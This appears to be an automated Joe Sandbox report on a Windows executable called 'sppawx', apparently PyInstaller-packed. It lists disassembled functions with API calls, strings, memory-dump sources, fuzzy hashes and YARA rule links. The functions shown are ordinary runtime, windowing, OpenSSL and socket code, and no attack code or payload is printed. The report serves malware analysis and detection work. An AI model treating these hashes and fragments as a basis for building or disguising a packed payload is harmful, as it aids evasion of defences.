Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID:
String ID: OiII$Unknown Bluetooth protocol$iy#
API String ID: 0-1931379703
Opcode ID: ad3d843d10d7db7a4cd706e23c15f528697868bdde29bc38f6a75b948b8f6895
Instruction ID: c51224ee5d3099873fa87bf5f6c81531039d487906c7439656c03b9f7abc7dfb
Opcode Fuzzy Hash: ad3d843d10d7db7a4cd706e23c15f528697868bdde29bc38f6a75b948b8f6895
Instruction Fuzzy Hash: 37511C61A1C652A2EB349B25E85417D63A4BFC5BB5F584133CA9E43EB4FF2CE446C300

Function 00007FF79A312180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF79A3121AB
SelectObject.GDI32 ref: 00007FF79A3121F2
DrawTextW.USER32 ref: 00007FF79A312215
SelectObject.GDI32 ref: 00007FF79A31222B
ReleaseDC.USER32 ref: 00007FF79A31223B
MoveWindow.USER32 ref: 00007FF79A31228B
MoveWindow.USER32 ref: 00007FF79A3122CB
MoveWindow.USER32 ref: 00007FF79A31231E
MoveWindow.USER32 ref: 00007FF79A312366

Strings

P%, xrefs: 00007FF79A3121FF

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 13ef7a764b34b3ef9999af5a9d635282f5e369fb83412a475949f4e179058214
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 26510626608BA186E6349F32A4181BAF7A1F798B65F404139EBDE43694DF3CD045CB20

Function 00007FF79A3180B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF79A3180EF
GetWindowLongPtrW.USER32 ref: 00007FF79A31816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF79A318182
GetLastError.KERNEL32 ref: 00007FF79A31818C
SetWindowLongPtrW.USER32 ref: 00007FF79A3181A3

Strings

Needs to remove its temporary files., xrefs: 00007FF79A318175

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 943160455aeb8172fbd34ec377870683d2d11d3614ebec3616e78f1de3fd73d0
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: FE218B22F0EA4281F765AF7AA858179F250FF84B90FD8427DEA2D433D4DE2CD5918324

Function 00007FFEDD23293C Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFEDD232964
__scrt_initialize_crt.LIBCMT ref: 00007FFEDD2329A9
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFEDD2329B6
_RTC_Initialize.LIBCMT ref: 00007FFEDD2329E4
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFEDD232A0A
__scrt_release_startup_lock.LIBCMT ref: 00007FFEDD232A35

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: edd2dffeb58312717817d9a95534815d5d46ae94dbed4835cd8b920937bfe9e7
Instruction ID: 833a013acd426542daec68a1eb96168ffd76893beb996a0bb966b86b7059e7fa
Opcode Fuzzy Hash: edd2dffeb58312717817d9a95534815d5d46ae94dbed4835cd8b920937bfe9e7
Instruction Fuzzy Hash: 22819B20E1C64386FA74AB699441A7D62A0EFC5B80F5C443FDA4C47FB6FE2DE9458310

Function 00007FFEDD272A70 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFEDD272A98
__scrt_initialize_crt.LIBCMT ref: 00007FFEDD272ADD
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFEDD272AEA
_RTC_Initialize.LIBCMT ref: 00007FFEDD272B18
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFEDD272B3E
__scrt_release_startup_lock.LIBCMT ref: 00007FFEDD272B69

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: f483b21f41d815f6d6d63f0a13c87fd0f68ae68320ff496c1413c579ba159f5c
Instruction ID: e3e66b7dd99e532136e23052e0d0326103b2132e695fbd6b3f0a62c64279ea20
Opcode Fuzzy Hash: f483b21f41d815f6d6d63f0a13c87fd0f68ae68320ff496c1413c579ba159f5c
Instruction Fuzzy Hash: 9381AF31E0C643AAF670AB669481ABD62A0AFD57A0F1C5037D94D47FB6FE3CE9458700

Function 00007FF79A326300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3269CC

Strings

p, xrefs: 00007FF79A32646D
:, xrefs: 00007FF79A3264FC
-, xrefs: 00007FF79A3263D9
p, xrefs: 00007FF79A3263F5
f, xrefs: 00007FF79A326465

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: b204774df767de4cc455d83b663f4b1b948884128e14486b2bb680a5435abb2f
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 4E127F62E0E14386FB74BA25A154679F692FF40750FD4C17DEE9A46AC4DF3CE5808B20

Function 00007FF79A321038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A321078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A321440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3216DF

Strings

f, xrefs: 00007FF79A321110
f, xrefs: 00007FF79A3212C5
p, xrefs: 00007FF79A32111D
p, xrefs: 00007FF79A321182
f, xrefs: 00007FF79A32117A

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 855a4d690a0ad25160f0d1e234178d31203c7a63648245964dd0b59980ceeac7
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 5B126132E0E14386FF70BA25A25467AF662FB80754FD8407DEF99469C4DB7DE4808B60

Function 00007FF79A311050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A311098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF79A311108
fseek, xrefs: 00007FF79A3110D3
fread, xrefs: 00007FF79A3111FD
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3110CC
malloc, xrefs: 00007FF79A31110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3111F6

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 88369a8d2ade53b1397bf66df6471b9bdc2045f6400eebad8fbd2a5e1e1acbe3
Instruction ID: d9a40c6133c7709e453d0ba19bfdb75d33054329388b94ad67079dad1ffceb43
Opcode Fuzzy Hash: 88369a8d2ade53b1397bf66df6471b9bdc2045f6400eebad8fbd2a5e1e1acbe3
Instruction Fuzzy Hash: 86418E61B0A65292FA20FB32A8046B9F390BF45BC4FC444BEED0D07796DE3CE5058760

Function 00007FF79A318850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF79A313CBB), ref: 00007FF79A3188F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A3188FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A31893C

Part of subcall function 00007FF79A318A20: GetEnvironmentVariableW.KERNEL32(00007FF79A31388E), ref: 00007FF79A318A57
Part of subcall function 00007FF79A318A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79A318A79

Part of subcall function 00007FF79A3282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3282C1

Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

TMP, xrefs: 00007FF79A31888C, 00007FF79A318993
_MEI%d, xrefs: 00007FF79A318902
TMP, xrefs: 00007FF79A3188B2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF79A3188CC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF79A31896E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction ID: 92834b5379f009da7cd5e9f734dce4119e060e99588c96a2d9a013f169ec9d6b
Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction Fuzzy Hash: 7F41BE11B0B64251FA30FB32A8552F9B291AF89BC4FC002BDED0D4779AEE3CE5018760

Function 00007FF79A31EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF79A31EAD5

Part of subcall function 00007FF79A31FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF79A31FA6F
Part of subcall function 00007FF79A31FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF79A31FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF79A31EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF79A31EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79A31EF08

Strings

csm, xrefs: 00007FF79A31EAEF
csm, xrefs: 00007FF79A31EBD0
csm, xrefs: 00007FF79A31EB56

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: f474149996b6a1c347da7fb6d685d38051a96b22233f299b68f64eb1c7eb1aea
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: C0D16B22A097418AFB20EB3594803BDB7A0FB45788FA0417EEE4D57B95DF39E081C760

Function 00007FFEDCBF2545 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 206COMMON

Download Yara Rule

APIs

00007FFEFBC53420.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFEDCC02008
GetLastError.KERNEL32 ref: 00007FFEDCC02172

Strings

%s/%s, xrefs: 00007FFEDCC01FE8
calling OPENSSL_dir_read(%s), xrefs: 00007FFEDCC0217B
..\s\ssl\ssl_cert.c, xrefs: 00007FFEDCC02166, 00007FFEDCC0219F, 00007FFEDCC021DC, 00007FFEDCC02229
SSL_add_dir_cert_subjects_to_stack, xrefs: 00007FFEDCC0215A, 00007FFEDCC02193, 00007FFEDCC0221D
SSL_add_file_cert_subjects_to_stack, xrefs: 00007FFEDCC021D0

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: 00007C53420ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
API String ID: 2011160099-502574948
Opcode ID: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
Instruction ID: 5ab3aa93ff43aff4fae7a08dedf1296161e9b96f31df06c893ea109f5837e25a
Opcode Fuzzy Hash: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
Instruction Fuzzy Hash: 5A915061A9C69282FA60AB19E5517BE6250EF84BC4F484033EB4D47FB6DE3CE447D702

Function 00007FF79A32ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF79A32F11A,?,?,0000018C7E748788,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF79A32F11A,?,?,0000018C7E748788,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EF08

Strings

ext-ms-, xrefs: 00007FF79A32EE59
api-ms-, xrefs: 00007FF79A32EE46

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: ea1248759f8e7edf585890b3fb33f1e4769a3801da29d36e3f60c88f36506d56
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 1E41F221B1AA1241FA35EB32A804575B791BF49BA4FE8417DED1D47784EF3CE4048360

Function 00007FFEDD275E98 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32 ref: 00007FFEDD275F8E
WSAIoctl.WS2_32 ref: 00007FFEDD275FFD
WSAIoctl.WS2_32 ref: 00007FFEDD27606A

Strings

invalid ioctl command %lu, xrefs: 00007FFEDD275F12
kI:ioctl, xrefs: 00007FFEDD275F50, 00007FFEDD276028
kO:ioctl, xrefs: 00007FFEDD275ED3
k(kkk):ioctl, xrefs: 00007FFEDD275FBB

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: Ioctl
String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
API String ID: 3041054344-4238462244
Opcode ID: 927c9b886349e2f6320387c9c7db8abdccd2030edac8569247d3ffb36c545990
Instruction ID: 946bd8db5711588d30d5e094147930df4d4cb9060a3ccb608b81c8833224da44
Opcode Fuzzy Hash: 927c9b886349e2f6320387c9c7db8abdccd2030edac8569247d3ffb36c545990
Instruction Fuzzy Hash: DF510832A18B42A9E770CB64E8405ED77B0FB88768F584136EA4E93E68EF38D555C740

Function 00007FF79A312C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
MessageBoxW.USER32 ref: 00007FF79A312D99

Strings

%ls: , xrefs: 00007FF79A312D22
Error, xrefs: 00007FF79A312D8C
<FormatMessageW failed.>, xrefs: 00007FF79A312D70
[PYI-%d:ERROR] , xrefs: 00007FF79A312CA6

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: f874663e905ea0a42771c04dbbe135fa9c96c8189b78b5e59d2757a39e82fc7d
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: D931B422B09B4142F630FB76B8442AAB695BF88798F80013DEF4D97B59DE3CD506C310

Function 00007FF79A31DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDBD
GetLastError.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE63
GetProcAddress.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE6F

Strings

api-ms-, xrefs: 00007FF79A31DDDD

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
